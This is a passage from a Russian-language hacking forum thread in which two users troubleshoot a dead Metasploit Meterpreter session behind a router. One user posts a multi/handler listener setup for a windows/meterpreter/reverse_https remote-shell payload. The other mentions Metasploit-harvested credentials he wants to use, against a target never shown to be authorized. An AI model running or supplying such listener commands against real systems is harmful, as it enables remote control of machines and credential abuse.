HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 06.03.2018, 13:53
kot-gor
Новичок
Регистрация: 07.09.2016
Сообщений: 0
С нами: 5095710

Репутация: 0
По умолчанию

а можете скинуть настройки листенера?
 
Ответить с цитированием

  #12  
Старый 06.03.2018, 15:06
Elektrolife
Новичок
Регистрация: 21.10.2016
Сообщений: 0
С нами: 5031678

Репутация: 0
По умолчанию

Цитата:

kot-gor сказал(а):

а можете скинуть настройки листенера?

Сейчас попробую найти.. А то я ковырял ковырял,забросил и уехал в отпуск )
 
Ответить с цитированием

  #13  
Старый 06.03.2018, 15:17
kot-gor
Новичок
Регистрация: 07.09.2016
Сообщений: 0
С нами: 5095710

Репутация: 0
По умолчанию

у вас мертвая сессия..одна из причин неправильные настройки листенера.Вы в локальной сети проводили тестирование, или с внешней.?
 
Ответить с цитированием

  #14  
Старый 06.03.2018, 15:19
Elektrolife
Новичок
Регистрация: 21.10.2016
Сообщений: 0
С нами: 5031678

Репутация: 0
По умолчанию

Цитата:

kot-gor сказал(а):

у вас мертвая сессия..одна из причин неправильные настройки листенера.Вы в локальной сети проводили тестирование, или с внешней.?

Внешний белый IP, пробовал и реверс и бинд TCP
 
Ответить с цитированием

  #15  
Старый 06.03.2018, 15:47
kot-gor
Новичок
Регистрация: 07.09.2016
Сообщений: 0
С нами: 5095710

Репутация: 0
По умолчанию

через роутер или впс?
 
Ответить с цитированием

  #16  
Старый 06.03.2018, 15:56
Elektrolife
Новичок
Регистрация: 21.10.2016
Сообщений: 0
С нами: 5031678

Репутация: 0
По умолчанию

Цитата:

kot-gor сказал(а):

через роутер или впс?

Через роутер
 
Ответить с цитированием

  #17  
Старый 06.03.2018, 16:06
kot-gor
Новичок
Регистрация: 07.09.2016
Сообщений: 0
С нами: 5095710

Репутация: 0
По умолчанию

вы использовали ReverseListenerBindAddress в листенере?
скиньте мне ваш листенер, более чем уверен вы там ошиблись.Дело в том, что если вы тестируете через роутер с белым статическим айпи настройки листенера немного другие..примерно так:

msf > use multi/handler
msf exploit (handler) > set payload windows/meterpreter/reverse_https
msf exploit (handler) > set LHOST (внешний ip)
msf exploit (handler) > set LPORT 4444
msf exploit (handler) > set ReverseListenerBindAddress (внутренний IP)
msf exploit (handler) >exploit -j
 
Ответить с цитированием

  #18  
Старый 07.03.2018, 14:15
Elektrolife
Новичок
Регистрация: 21.10.2016
Сообщений: 0
С нами: 5031678

Репутация: 0
По умолчанию

Цитата:

kot-gor сказал(а):

вы использовали ReverseListenerBindAddress в листенере?
скиньте мне ваш листенер, более чем уверен вы там ошиблись.Дело в том, что если вы тестируете через роутер с белым статическим айпи настройки листенера немного другие..примерно так:

msf > use multi/handler
msf exploit (handler) > set payload windows/meterpreter/reverse_https
msf exploit (handler) > set LHOST (внешний ip)
msf exploit (handler) > set LPORT 4444
msf exploit (handler) > set ReverseListenerBindAddress (внутренний IP)
msf exploit (handler) >exploit -j

блин,не могу найти теперь таргет,после него забабахал уже кучу других... По факту - я точно не указывал ReverseListenerBindAddress )

немножко оффтоп:

метасплоит накопал некоторое количество кредов,но я никак не пойму,как ими воспользоваться ) В браузере по указанным портам не выдаёт форму логина\пароля... Как он проверил их на валидность ?

 
Ответить с цитированием

  #19  
Старый 07.03.2018, 15:01
kot-gor
Новичок
Регистрация: 07.09.2016
Сообщений: 0
С нами: 5095710

Репутация: 0
По умолчанию

вы проделайте всё заново, и сбросьте мне скрины консоли.
 
Ответить с цитированием

  #20  
Старый 12.03.2018, 11:14
Elektrolife
Новичок
Регистрация: 21.10.2016
Сообщений: 0
С нами: 5031678

Репутация: 0
По умолчанию

Цитата:

kot-gor сказал(а):

вы проделайте всё заново, и сбросьте мне скрины консоли.

Скорее всего выключили сервер ( nmap говорит что сервер down.. Если поднимется - обязательно продолжу изыскания )
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.